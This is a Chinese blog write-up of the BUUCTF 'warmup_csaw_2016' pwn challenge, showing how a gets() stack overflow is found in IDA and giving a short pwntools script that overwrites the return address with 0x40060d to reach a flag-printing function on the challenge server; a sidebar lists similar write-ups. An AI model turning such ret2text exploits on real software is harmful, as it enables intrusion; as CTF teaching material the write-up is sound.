BUUCTF-warmup_csaw_2016

最新推荐文章于 2023-08-01 21:54:00 发布
最新推荐文章于 2023-08-01 21:54:00 发布
阅读量429 收藏
点赞数
分类专栏: PWN的学习 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130090812
版权

1.checksec/file

64位的linux文件

2.ida

找到主函数

 发现致命函数 get() 因为get可以无限输入

看看有没有什么函数我们可以返回的

双击进入sub_40060d

 直接发现这个函数是取flag的 所以我们开始看这个函数的地址

 所以函数地址是 0x40060d

我们看看get什么时候开始的

发现get是40h开始 然后因为64位有8位的rdp 所以需要40h+8

40h=64    --->  64+8

或者0x40+0x08=0x48

3.exp

from pwn import *
p=remote('node4.buuoj.cn',27652)
payload=b'A'*64+b'B'*8+p64(0x40060d)
p.sendline(payload)
p.interactive()





from pwn import *
p=remote('node4.buuoj.cn',27652)
payload=b'A'*(0x40+0x08)+p64(0x40060d)
p.sendline(payload)
p.interactive()

两个一样的

 

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 431
buuctf pwn
BUUCTF warmup_csaw_2016
m0_54262894的博客
08-20 329
BUUCTF warmup_csaw_2016 下载文件,把它拖入虚拟机中先checksec一下 这是一个64位的文件,并且没有开启任何的保护 我们先运行一下试试 发现它给出了一个地址,我们先记下,可能会用到 放入64位IDA中查看一下他的代码 伪C代码↓ 汇编代码↓ 发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址 下面是我搜索到的信息 我们双击40060D看一下 再回过头来看代码 众所周知gets函.
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 364
和第一题RIP一样,是经典而基础的ret2text。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 337
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
pytorch-gradual-warmup-lr:PyTorch的逐步预热学习速率调度程序
02-05
$ pip install git+https://github.com/ildoonet/pytorch-gradual-warmup-lr.git 用法 请参阅文件。 import torch from torch . optim . lr_scheduler import StepLR , ExponentialLR from torch . optim . sgd ...
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
资源来自pypi官网。 资源全名:warmup_scheduler-0.3.tar.gz
treinamento-maps_solid_agile-oo-warmup:MAPS SA的SOLID培训的热身项目
05-07
training-maps_solid_agile-oo-warmup 由MAPS SA的Akira A.进行的SOLID培训的热身项目。 Maven项目。 运行:mvn -quiet Program1是由MessageFormatterAndLogger表示的库的客户端。 这个“库”有一个小的设计问题。 ...
markdown_warmup_html
05-28
markdown-warmup-html。
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3539
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 363
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 110
BUUCTF 做题练习
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1195
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
PWN学习记录(3)BUUCTF-warmup_csaw_2016
最新发布
m0_58824086的博客
08-01 295
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
初学pwn-BUUCTF(warmup_csaw_2016)
天柱的博客
08-31 320
初学pwn-writeUp BUUCTF的第三道题,warmup_csaw_2016。 首先链接远端, 发现这里输出了一个十六进制的数字,就没有了后续。我们下载文件,持用ida打开查看。 可以看到主函数这里上边全部都是输出,只有最后return的时候,有一个get命令,给v5这个数组进行赋值。从这里可以发信啊,刚刚输出的一个地址,是sub40060D这个函数的地址。点进去看一下。 哦吼,cat flag.txt,那没毛病了,只需要在主函数的get这产生栈溢出,覆盖掉返回的值,就可以执行这个函数,获取f
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 985
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 432
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1266
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
warmup_csaw_2016 1
03-16
这是一道CSAW 2016年的预热题目,需要我们在给定的字符串中找到所有的数字,并将它们相加起来。 具体的做法是,我们可以遍历字符串中的每一个字符,判断它是否是数字,如果是数字就将它转换成整数并加到总和中。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值